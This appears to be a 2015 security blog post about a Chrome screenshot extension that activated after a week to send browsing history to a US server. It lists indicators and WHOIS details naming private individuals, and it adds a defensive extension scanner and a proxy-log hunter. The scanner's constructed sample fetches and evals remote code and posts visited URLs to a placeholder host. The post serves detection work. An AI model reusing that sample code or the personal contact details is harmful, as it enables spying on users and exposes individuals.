Are you ready for Webpage Screenshot, the latest Trojan horse?

Our malware labs have detected a popular Google Chrome extension, Webpage Screenshot, that systematically collects users' browsing history in order to sell it to a third party.

In Denmark alone, the extension has been downloaded by 39,289 users (see the attached screenshot), and by more than 1.2 million users worldwide. At the same time, it carries a very good rating: 4.5 out of 5.

The main problem with this extension, or rather spyware, is that it records which websites the user visits and sends that information to a server located in the United States.

Peter Kruse, founder of CSIS Security Group, says:

To avoid any security check or detection mechanism from Google, Webpage Screenshot includes a sleep function, so that the spyware-like behavior will not be activated right away, but a week later.

Apparently, there is an important vulnerability in how code validation is done for each extension in Google Chrome, which makes us wonder how many extensions are still out there that hide spyware.

Our research revealed that this spyware has affected not only home users, but also large companies in Sweden:

The browser receives instructions to constantly send information about which websites have been visited to a server in the United States… The owner of Webpage Screenshot confirmed that he has added code that sends data on which sites users visit. The aim is to “produce statistics on surfing behavior” and sell it. He says the information is commercially valuable, and that it is not the users’ individual visits that are of interest, but their combined surfing behavior across different sites.

Where is this extension coming from?

The extension's homepage is at webpagescreenshot[.]info, and the domain's registration record lists the following registrant:

Registrant Name: Danny Gembom
Registrant Organization:
Registrant Street: Rehovot POB 80
Registrant City: Rehovot
Registrant State/Province:
Registrant Postal Code: 38819
Registrant Country: IL
Registrant Phone: +972.542290258

The record also lists an e-mail address on the domain bubbles.co.il, whose own registration record gives more detail:

person: Aminadav Glickshein
address: Nof Ayalon P.O.B 6
address: D.N. Shimshon
address: 99785
address: Israel
phone: +972 8 9790049
e-mail: AminadavG AT gmail.com

Although the website is still up, its Download button, which should lead to the Chrome Web Store listing, now lands on a page showing that the extension has been removed.

How does Webpage Screenshot behave?

Here, briefly, is the sequence of events once this extension is installed:

The user installs the extension from the Chrome Web Store, where it behaves as advertised.

About a week later the spyware capabilities are activated by downloading additional code from the web. Because that code is not part of the package Google reviews, the store's security checks see only the benign part and cannot detect the spyware features.

Once the data collection is active, information that can be used to identify an individual is transmitted to the United States, to the IP address 64.34.175.88 (Serverbeach, New York, USA). Looking up that IP address yields a number of hostnames related to this service:

webpagescreenshot[.]info

c.webpagescreenshot[.]info

ch.webpagescreenshot[.]info

s1.webpagescreenshot[.]info

ww.webpagescreenshot[.]info

che.webpagescreenshot[.]info

ftp.webpagescreenshot[.]info

www.webpagescreenshot[.]info

cheg.webpagescreenshot[.]info

youtube.cwww.webpagescreenshot[.]info

ywww.webpagescreenshot[.]info

youtube.cowww.webpagescreenshot[.]info

yowww.webpagescreenshot[.]info

youtube.comwww.webpagescreenshot[.]info

youwww.webpagescreenshot[.]info

youtwww.webpagescreenshot[.]info

youtuwww.webpagescreenshot[.]info

youtubwww.webpagescreenshot[.]info

Our malware specialists have already blocked this IP address and these hostnames in order to protect our users.
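The behaviour just described (broad permissions, activation delayed by about a week, code downloaded and run after install, visited URLs posted to a remote server) leaves traces in an extension's own source that a reviewer can look for before the timer ever fires. The following Node.js script is an added example written for this article; it is not code from the original post and not the extension's code. It runs simple heuristics over an unpacked extension's manifest and scripts and exercises them on two constructed samples: one modelled on the described behaviour (with the placeholder host c.stats.example.net standing in for whatever server a real sample would use) and one benign screenshot extension. The one-day delay threshold and the list of "broad" permissions are assumptions chosen for this example.

```javascript
// Heuristic static triage of an unpacked Chrome extension for the behaviour
// described above: over-broad permissions, activation delayed by days, code
// fetched and evaluated at runtime, and a tab listener that posts visited URLs
// to a remote host. Heuristics only; a real review still reads the code.
'use strict';

// Permissions that let an extension observe every page the user visits.
const BROAD_PERMISSIONS = new Set([
  'tabs', 'history', 'webRequest', 'webNavigation', '<all_urls>',
  'http://*/*', 'https://*/*', '*://*/*',
]);
const DAY_MS = 24 * 60 * 60 * 1000; // assumption: a delay of a day or more is suspicious
// Hosts an extension legitimately contacts for the Web Store itself.
const GOOGLE_HOSTS = /(^|\.)(google\.com|googleapis\.com|gstatic\.com)$/;

// Evaluate a constant arithmetic expression such as "7 * 24 * 60". Only digits,
// whitespace, + * and . pass the filter, so no extension code is ever run.
function constNumber(expr) {
  if (!/^[\d\s+*.]+$/.test(expr)) return NaN;
  try { return Function(`"use strict"; return (${expr});`)(); } catch (e) { return NaN; }
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

function triageExtension(manifest, sources) {
  const findings = [];
  const code = Object.values(sources).join('\n');

  // 1. Over-broad permissions (MV2 "permissions" and MV3 "host_permissions").
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const broad = perms.filter((p) => BROAD_PERMISSIONS.has(p));
  if (broad.length) findings.push({ code: 'BROAD_PERMISSIONS', detail: broad.join(', ') });

  // 2. Delayed activation: a setTimeout or chrome.alarms delay of a day or more.
  const delaysMs = [];
  for (const m of code.matchAll(/setTimeout\s*\([\s\S]*?,\s*([\d\s+*.]+)\)/g)) delaysMs.push(constNumber(m[1]));
  for (const m of code.matchAll(/delayInMinutes\s*:\s*([\d\s+*.]+)/g)) delaysMs.push(constNumber(m[1]) * 60 * 1000);
  for (const m of code.matchAll(/when\s*:\s*Date\.now\(\)\s*\+\s*([\d\s+*.]+)/g)) delaysMs.push(constNumber(m[1]));
  const longDelays = delaysMs.filter((d) => d >= DAY_MS);
  if (longDelays.length) {
    findings.push({ code: 'DELAYED_ACTIVATION',
      detail: longDelays.map((d) => `${(d / DAY_MS).toFixed(1)} days`).join(', ') });
  }

  // 3. Remote code: a non-Google URL in the source plus dynamic evaluation means
  //    the code Google reviewed is not the code that runs a week later.
  const remoteHosts = new Set();
  for (const m of code.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    const h = hostOf(m[0]);
    if (h && !GOOGLE_HOSTS.test(h)) remoteHosts.add(h);
  }
  const evalUsed = /\beval\s*\(|\bnew\s+Function\s*\(|\bimportScripts\s*\(/.test(code);
  if (evalUsed && remoteHosts.size) findings.push({ code: 'REMOTE_CODE', detail: [...remoteHosts].join(', ') });

  // 4. History exfiltration: a navigation/tab listener plus an outbound request
  //    that references a .url field, aimed at a remote host.
  const tabListener = /chrome\.(tabs\.onUpdated|webNavigation\.onCompleted|webRequest\.onBeforeRequest)\.addListener/.test(code);
  const sendsOut = /\b(fetch|sendBeacon|XMLHttpRequest)\s*\(/.test(code);
  if (tabListener && sendsOut && remoteHosts.size && /\.url\b/.test(code)) {
    findings.push({ code: 'HISTORY_EXFIL', detail: [...remoteHosts].join(', ') });
  }
  return findings;
}

// Constructed sample modelled on the behaviour described in the post (NOT the
// real extension's code). c.stats.example.net is a placeholder host.
const SUSPICIOUS_MANIFEST = {
  name: 'Screenshot Helper (constructed sample)', manifest_version: 2,
  permissions: ['activeTab', 'tabs', '<all_urls>', 'storage', 'alarms'],
};
const SUSPICIOUS_SOURCES = {
  'background.js': `
    chrome.alarms.create('activate', { delayInMinutes: 7 * 24 * 60 });
    chrome.alarms.onAlarm.addListener(function () {
      fetch('https://c.stats.example.net/payload.js').then(r => r.text()).then(src => eval(src));
    });
    chrome.tabs.onUpdated.addListener(function (id, info, tab) {
      if (info.status === 'complete') {
        fetch('https://c.stats.example.net/log', { method: 'POST', body: tab.url });
      }
    });`,
};
// Constructed benign screenshot extension for comparison: captures only on click.
const BENIGN_MANIFEST = { name: 'Benign Screenshot', manifest_version: 2, permissions: ['activeTab'] };
const BENIGN_SOURCES = {
  'background.js': `
    chrome.browserAction.onClicked.addListener(function () {
      chrome.tabs.captureVisibleTab(null, { format: 'png' }, function (dataUrl) { /* save */ });
    });`,
};

function report(label, manifest, sources) {
  const findings = triageExtension(manifest, sources);
  console.log(`${label}: ${findings.length ? findings.map((f) => `${f.code} (${f.detail})`).join('; ') : 'no findings'}`);
  return findings;
}
report('constructed suspicious sample', SUSPICIOUS_MANIFEST, SUSPICIOUS_SOURCES);
report('constructed benign sample', BENIGN_MANIFEST, BENIGN_SOURCES);
```

A screenshot extension legitimately needs activeTab and often tabs, so the permission finding on its own proves nothing; what makes a sample worth a closer look is the combination of a timer set days ahead, a fetch whose response is passed to eval, and a tab listener that sends tab.url off-box. Any of these can also be obfuscated or split across files, which is why the script concatenates all sources and why it is a triage aid rather than a verdict.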

Conclusion

Cybercriminals’ ability and imagination seem to have no limits when it comes to retrieving sensitive data and financial information.

Browser extensions are pieces of code like any other, which means they can deliver malicious payloads or act as Trojan horses that hide spyware functions and steal personal details from users.

Although Google moved fast and removed the extension from the Chrome Web Store, it is obvious that the store's security mechanisms need to improve quickly, especially when an extension like this can reach over one million users.

If you have already installed this Google Chrome extension, make sure you remove it (via chrome://extensions) as soon as possible. Stay Safe!
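Removing the extension from one machine is the easy part; an organisation also needs to know which machines had it. The indicators the article lists (the webpagescreenshot[.]info domain and its hostnames, and the server 64.34.175.88) can be hunted in proxy logs. The following Node.js script is an added example written for this article, not code from the original post or from any vendor; it parses a simplified, constructed "timestamp client method url dest-ip status" log format, matches each request against the indicators, and reports affected clients. The sample log lines, their paths and client addresses are all constructed for the example, and the exact log format is an assumption to be adapted to your own proxy.

```javascript
// Hunt proxy logs for clients that contacted the Webpage Screenshot
// infrastructure listed in the post: any host under webpagescreenshot.info and
// the server 64.34.175.88. The log lines below are CONSTRUCTED for this example
// in a simplified "timestamp client method url dest-ip status" format; adapt
// parseLine() to your proxy's real format.
'use strict';

// Indicators exactly as the post lists them, defanged; refanged for matching.
const IOC_DOMAINS = ['webpagescreenshot[.]info'].map((d) => d.replace(/\[\.\]/g, '.'));
const IOC_IPS = new Set(['64.34.175.88']);

// Exact domain or subdomain match, so lookalikes such as
// "notwebpagescreenshot.info" or "webpagescreenshot.info.example.org" do not hit.
function matchesDomain(host, domain) {
  const h = host.toLowerCase().replace(/\.$/, '');
  return h === domain || h.endsWith('.' + domain);
}

// Returns null for lines that do not fit the assumed format.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 6) return null;
  const [ts, client, method, url, destIp, status] = parts;
  let host;
  try { host = new URL(url).hostname; } catch (e) { return null; }
  return { ts, client, method, url, host, destIp, status };
}

// Every indicator a record matches; a beacon host usually also resolves to the IP.
function indicatorsFor(rec) {
  const hits = [];
  if (IOC_IPS.has(rec.destIp)) hits.push('ip:' + rec.destIp);
  else if (IOC_IPS.has(rec.host)) hits.push('ip:' + rec.host);
  for (const d of IOC_DOMAINS) if (matchesDomain(rec.host, d)) hits.push('domain:' + rec.host.toLowerCase());
  return hits;
}

// One entry per affected client: first-seen timestamp, hit count, indicators.
function huntProxyLog(lines) {
  const byClient = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const hits = indicatorsFor(rec);
    if (!hits.length) continue;
    const e = byClient.get(rec.client) ||
      { client: rec.client, firstSeen: rec.ts, hits: 0, indicators: new Set() };
    e.hits += 1;
    if (rec.ts < e.firstSeen) e.firstSeen = rec.ts; // ISO-8601 UTC sorts lexically
    hits.forEach((h) => e.indicators.add(h));
    byClient.set(rec.client, e);
  }
  return [...byClient.values()].map((e) => ({ ...e, indicators: [...e.indicators].sort() }));
}

// Constructed sample log: two requests to a listed subdomain, one homepage visit,
// one request straight to the IP, two lookalike domains that must not match,
// unrelated traffic, and a malformed line.
const SAMPLE_LOG = [
  '2015-04-14T08:02:11Z 10.0.4.17 GET http://c.webpagescreenshot.info/ 64.34.175.88 200',
  '2015-04-14T08:02:12Z 10.0.4.17 POST http://c.webpagescreenshot.info/ 64.34.175.88 200',
  '2015-04-14T08:05:40Z 10.0.4.23 GET http://www.webpagescreenshot.info/ 64.34.175.88 200',
  '2015-04-14T08:06:01Z 10.0.4.31 POST http://64.34.175.88/ 64.34.175.88 200',
  '2015-04-14T08:07:19Z 10.0.4.42 GET http://notwebpagescreenshot.info/ 198.51.100.7 200',
  '2015-04-14T08:07:20Z 10.0.4.42 GET http://webpagescreenshot.info.example.org/ 198.51.100.8 200',
  '2015-04-14T08:08:00Z 10.0.4.50 GET http://www.example.com/ 93.184.216.34 200',
  'malformed line',
];

for (const e of huntProxyLog(SAMPLE_LOG)) {
  console.log(`${e.client} first seen ${e.firstSeen}, ${e.hits} hit(s): ${e.indicators.join(', ')}`);
}
```

Two caveats when reading the results. The article does not say which of the listed hostnames receives the beacons, so the whole domain plus the IP is matched, and a single GET to the www homepage may just be someone reading about the extension; repeated requests from the same client, especially POSTs, are the stronger signal. The IP belongs to a hosting provider and can be reassigned, so bound the IP indicator to the period in which the extension was live rather than alerting on it forever.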


This post was originally published by Aurelian Neagu in April 2015.